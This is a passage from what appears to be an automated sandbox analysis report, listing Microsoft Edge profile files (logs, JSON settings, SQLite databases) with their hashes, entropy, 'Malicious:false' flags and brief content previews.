                                                                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.088017626873608
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LZM+q2PN723oH+Tcwt8NIFUt8OL2Zmw+OLJqMVkwON723oH+Tcwt8+eLJ:7NM+vVaYebpFUt8OC/+OUMV5OaYebqJ
                                                                                                                                                                                                                                                                                                                        MD5:59B9D5499134BD682167EFF12B1C4A13
                                                                                                                                                                                                                                                                                                                        SHA1:3A73C69338D58C8232A2481900FC9259EE3A77BB
                                                                                                                                                                                                                                                                                                                        SHA-256:AC54C7C3104253F84E2CF212FC3DD2E51F6633CCE7AB2D6A4728038E11B2B3FD
                                                                                                                                                                                                                                                                                                                        SHA-512:3B8DBC2275E72D02D4055D44FB6979F8EAD2283F18550BB3B7E2B7238CBC674C483DDE40C9C3425CB214192DFCBF19113E2CCE23836937EE5B27050801C7C1F2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:26.024 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:40:26.024 1c8c Recovering log #3.2024/12/10-12:40:26.025 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.088017626873608
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LZM+q2PN723oH+Tcwt8NIFUt8OL2Zmw+OLJqMVkwON723oH+Tcwt8+eLJ:7NM+vVaYebpFUt8OC/+OUMV5OaYebqJ
                                                                                                                                                                                                                                                                                                                        MD5:59B9D5499134BD682167EFF12B1C4A13
                                                                                                                                                                                                                                                                                                                        SHA1:3A73C69338D58C8232A2481900FC9259EE3A77BB
                                                                                                                                                                                                                                                                                                                        SHA-256:AC54C7C3104253F84E2CF212FC3DD2E51F6633CCE7AB2D6A4728038E11B2B3FD
                                                                                                                                                                                                                                                                                                                        SHA-512:3B8DBC2275E72D02D4055D44FB6979F8EAD2283F18550BB3B7E2B7238CBC674C483DDE40C9C3425CB214192DFCBF19113E2CCE23836937EE5B27050801C7C1F2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:26.024 1c8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/10-12:40:26.024 1c8c Recovering log #3.2024/12/10-12:40:26.025 1c8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6216313576810406
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:+T0xVGx7zz4ugEWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kErr95Cv:+Zx8uyhH+bDo3iN0Z2TVJkXBBE3ybn
                                                                                                                                                                                                                                                                                                                        MD5:7430E8965E7F8F9658B3CF82A2F8690B
                                                                                                                                                                                                                                                                                                                        SHA1:E0E943BF2F1DE8B9A9C5729D9BEA292FF29394D9
                                                                                                                                                                                                                                                                                                                        SHA-256:09A719E8107C04533299A5102778B729B3ED35E5BA69C2FF8847D3AC754B981A
                                                                                                                                                                                                                                                                                                                        SHA-512:71F04B613616841E46640A45A8CC330EBD9F3600959F7AC44921B36196153EAB2940790F7ABF33BE5E1885CAD7F27A1324F8666BFF9386B643A5516A13F5C9A9
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):8720
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.21729969015418618
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:+9tFlljq7A/mhWJFuQ3yy7IOWUjACtdweytllrE9SFcTp4AGbNCV9RUIv:+G75fO5Zd0Xi99pEYt
                                                                                                                                                                                                                                                                                                                        MD5:6E682698D0F5084191478FF5D8255C22
                                                                                                                                                                                                                                                                                                                        SHA1:527F45B8A2351B7FF86FDCFB56A7E42E4FC3CC02
                                                                                                                                                                                                                                                                                                                        SHA-256:7F090A8AB22F1F4EB12864CB8E23B6AAD38E3EBDFBB6D6487C06ABCD5527A818
                                                                                                                                                                                                                                                                                                                        SHA-512:924FC1FEA0162F784E666AAE822DD6CC1CB15088AA334E7E6C6203AA233066C01A9A7B9A137544E4F25C6D81FD846952700C054B6C93BC68B9EC9C79E3E0929E
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.............&.e...&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):115717
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                        MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                        SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                        SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                        SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):49152
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.6480765067883114
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:384:aj9P0tcAjl+QkQerDP/Kbt+773pL9hCgam6ItRKToaAu:adTKl+e2DP/P7Pv9RKcC
                                                                                                                                                                                                                                                                                                                        MD5:206D5391A36486D9E39C96DC9C6995AB
                                                                                                                                                                                                                                                                                                                        SHA1:0D3ECF912D29427827B87521F9010AF7E2D84EF0
                                                                                                                                                                                                                                                                                                                        SHA-256:CE70C08E22AFBECDF3D344FCC276BEDA4A4CA9B8C1EAF8DCA15CB663943F7B6F
                                                                                                                                                                                                                                                                                                                        SHA-512:26AE30E175400A8921499A5B76D4A402B8CBC014BE48BE68D79230380C579657C3FBFC2A550ECF391EAC64672FF83FEB577FA30C5F33DF1C256B5A271F71EDF1
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.247988073087833
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7upvVaYeb8rcHEZrELFUt8OuvZ/+OuO5OaYeb8rcHEZrEZSJ:7qVaYeb8nZrExg8OMbOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                        MD5:B72ACF039EFB4F906B13003736A532B4
                                                                                                                                                                                                                                                                                                                        SHA1:9EE7A90D18233D8B87BC99DE27C61CA524F207B0
                                                                                                                                                                                                                                                                                                                        SHA-256:AEF5E772E4A3B33D873C510DB3F084C28C5AECDB421B2F421D5221E41440E69B
                                                                                                                                                                                                                                                                                                                        SHA-512:644C491B92611B094173C20C202B74A9129C6346D2BF8F0B0055E829A00C7D365EC09CA7C8D884BF90F5D7C2D188B4C1BC4374FC51F793DA808037235926E719
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:29.661 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:40:29.662 1c84 Recovering log #3.2024/12/10-12:40:29.663 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):412
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.247988073087833
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7upvVaYeb8rcHEZrELFUt8OuvZ/+OuO5OaYeb8rcHEZrEZSJ:7qVaYeb8nZrExg8OMbOaYeb8nZrEZe
                                                                                                                                                                                                                                                                                                                        MD5:B72ACF039EFB4F906B13003736A532B4
                                                                                                                                                                                                                                                                                                                        SHA1:9EE7A90D18233D8B87BC99DE27C61CA524F207B0
                                                                                                                                                                                                                                                                                                                        SHA-256:AEF5E772E4A3B33D873C510DB3F084C28C5AECDB421B2F421D5221E41440E69B
                                                                                                                                                                                                                                                                                                                        SHA-512:644C491B92611B094173C20C202B74A9129C6346D2BF8F0B0055E829A00C7D365EC09CA7C8D884BF90F5D7C2D188B4C1BC4374FC51F793DA808037235926E719
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:29.661 1c84 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/10-12:40:29.662 1c84 Recovering log #3.2024/12/10-12:40:29.663 1c84 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.11967258901582
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LGt+q2PN723oH+Tcwt8a2jMGIFUt8OLFGZmw+OLe8VkwON723oH+Tcwt8a2jMmd:7SovVaYeb8EFUt8OI/+OP5OaYeb8bJ
                                                                                                                                                                                                                                                                                                                        MD5:01ABD2103321E19CE9B698C6B409664D
                                                                                                                                                                                                                                                                                                                        SHA1:EFAC9695B83C5C4FCFD16B639E2515D955D93C4A
                                                                                                                                                                                                                                                                                                                        SHA-256:A34BEB83E17E0130BA30369519CE4ADDFF0C507E56BF7943B5E424C3E89803E2
                                                                                                                                                                                                                                                                                                                        SHA-512:6198BFDCD17A5828C5B57A9B765E526FF66853D65EEBBD48BEE6510EEE7F1EA2BA8E83411E7E1914F4E6EB1C9B22FE8DBFAC1729505A80D74BED89FD9D47A481
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:24.287 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:24.289 1d98 Recovering log #3.2024/12/10-12:40:24.291 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.11967258901582
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LGt+q2PN723oH+Tcwt8a2jMGIFUt8OLFGZmw+OLe8VkwON723oH+Tcwt8a2jMmd:7SovVaYeb8EFUt8OI/+OP5OaYeb8bJ
                                                                                                                                                                                                                                                                                                                        MD5:01ABD2103321E19CE9B698C6B409664D
                                                                                                                                                                                                                                                                                                                        SHA1:EFAC9695B83C5C4FCFD16B639E2515D955D93C4A
                                                                                                                                                                                                                                                                                                                        SHA-256:A34BEB83E17E0130BA30369519CE4ADDFF0C507E56BF7943B5E424C3E89803E2
                                                                                                                                                                                                                                                                                                                        SHA-512:6198BFDCD17A5828C5B57A9B765E526FF66853D65EEBBD48BEE6510EEE7F1EA2BA8E83411E7E1914F4E6EB1C9B22FE8DBFAC1729505A80D74BED89FD9D47A481
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:24.287 1d98 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/10-12:40:24.289 1d98 Recovering log #3.2024/12/10-12:40:24.291 1d98 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0afd0b11-9357-4a3f-8d48-fe15a8b60045.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1630e6c2-6d30-4f61-ad1c-59f471174b91.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\225c7723-4145-4e02-8c0a-ac27ec2591a9.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1452
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                                                                        MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                                                                        SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                                                                        SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                                                                        SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7ce71b9e-0093-484e-8663-aa6c89f45912.tmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                        Size (bytes):1808
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.312174352056535
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:48:YcCpfC0gCzsYtscfcKs2NleeIakEsaCxbm:F2fhvzfNkeIak+AK
                                                                                                                                                                                                                                                                                                                        MD5:E814BF34CAE49541F900A6F62AFF133D
                                                                                                                                                                                                                                                                                                                        SHA1:2EDAF3D651581E7E735F3C3C355E7827F03A179A
                                                                                                                                                                                                                                                                                                                        SHA-256:A6942F380B97AF989BE6CF7B419A12EFFDD80760DF308ABDC95FB1F4CBB935C5
                                                                                                                                                                                                                                                                                                                        SHA-512:BBB6BB060FA23E2C523AAA8EE6944546DABD13D60F996840BB89CAE745461780D59E1E22714B9FFC783AD01B589A0261F9159E897F06513C25FEF8AA481AA19E
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918029092623","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380918033180947","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
